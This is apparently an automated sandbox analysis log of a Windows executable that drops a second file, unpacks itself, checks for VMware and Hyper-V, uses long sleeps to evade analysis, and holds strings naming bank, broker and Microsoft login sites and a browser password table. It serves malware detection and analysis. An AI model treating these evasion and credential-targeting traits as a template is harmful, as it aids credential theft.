        Source: BF85.tmp.exe, 00000003.00000003.2309650038.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000003.2305387788.0000000002E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Ljrprfl3BH.exeVirustotal: Detection: 38%
        Source: Ljrprfl3BH.exeReversingLabs: Detection: 50%
        Source: unknownProcess created: C:\Users\user\Desktop\Ljrprfl3BH.exe "C:\Users\user\Desktop\Ljrprfl3BH.exe"
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeProcess created: C:\Users\user\AppData\Local\Temp\BF85.tmp.exe "C:\Users\user\AppData\Local\Temp\BF85.tmp.exe"
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1688
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeProcess created: C:\Users\user\AppData\Local\Temp\BF85.tmp.exe "C:\Users\user\AppData\Local\Temp\BF85.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeUnpacked PE file: 0.2.Ljrprfl3BH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yabatop:W;.kip:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeUnpacked PE file: 3.2.BF85.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeUnpacked PE file: 0.2.Ljrprfl3BH.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeUnpacked PE file: 3.2.BF85.tmp.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
        Source: Ljrprfl3BH.exeStatic PE information: section name: .yabatop
        Source: Ljrprfl3BH.exeStatic PE information: section name: .kip
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_00410756 push ecx; ret 0_2_00410769
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0040FD82 push ecx; ret 0_2_0040FD95
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0070C389 push 00000003h; ret 0_2_0070C38D
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0070A5CC push es; iretd 0_2_0070A5DD
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0070B69C push ds; ret 0_2_0070B6A5
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0070E998 pushad ; ret 0_2_0070E9B4
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0070EB15 push ecx; ret 0_2_0070EB32
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021C798F push esp; retf 0_2_021C7997
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021A09BD push ecx; ret 0_2_021A09D0
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021ACE08 push es; retf 0_2_021ACE0D
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021C7F8D push esp; retf 0_2_021C7F8E
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0219FFE9 push ecx; ret 0_2_0219FFFC
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh3_2_00441853
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00543156 push ebx; ret 3_2_00543157
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0054512A pushad ; ret 3_2_0054512B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00545195 pushfd ; ret 3_2_00545196
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00543CFE push esi; retn 001Ch3_2_00543D02
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0077B05A push ebp; iretd 3_2_0077B05D
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00791AB7 push eax; mov dword ptr [esp], 0E0908DBh3_2_00791ABA
        Source: Ljrprfl3BH.exeStatic PE information: section name: .text entropy: 7.538235884567587
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.810340877907069
        Source: BF85.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.810340877907069
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeFile created: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeJump to dropped file
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E96A
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeWindow / User API: threadDelayed 814Jump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeWindow / User API: threadDelayed 9173Jump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-64557
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeAPI coverage: 5.1 %
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exe TID: 6244Thread sleep count: 814 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exe TID: 6244Thread sleep time: -587708s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exe TID: 6244Thread sleep count: 9173 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exe TID: 6244Thread sleep time: -6622906s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exe TID: 6416Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021C8C49 FindFirstFileExW,0_2_021C8C49
        Source: Amcache.hve.7.drBinary or memory string: VMware
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
        Source: Ljrprfl3BH.exe, 00000000.00000002.4666397816.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000767000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
        Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
        Source: Ljrprfl3BH.exe, 00000000.00000003.4540378694.000000000079B000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000002.4666397816.000000000079B000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmp, BF85.tmp.exe, 00000003.00000002.2393532432.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Ljrprfl3BH.exe, 00000000.00000002.4666495505.00000000007B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
        Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
        Source: Amcache.hve.7.drBinary or memory string: vmci.sys
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
        Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
        Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
        Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
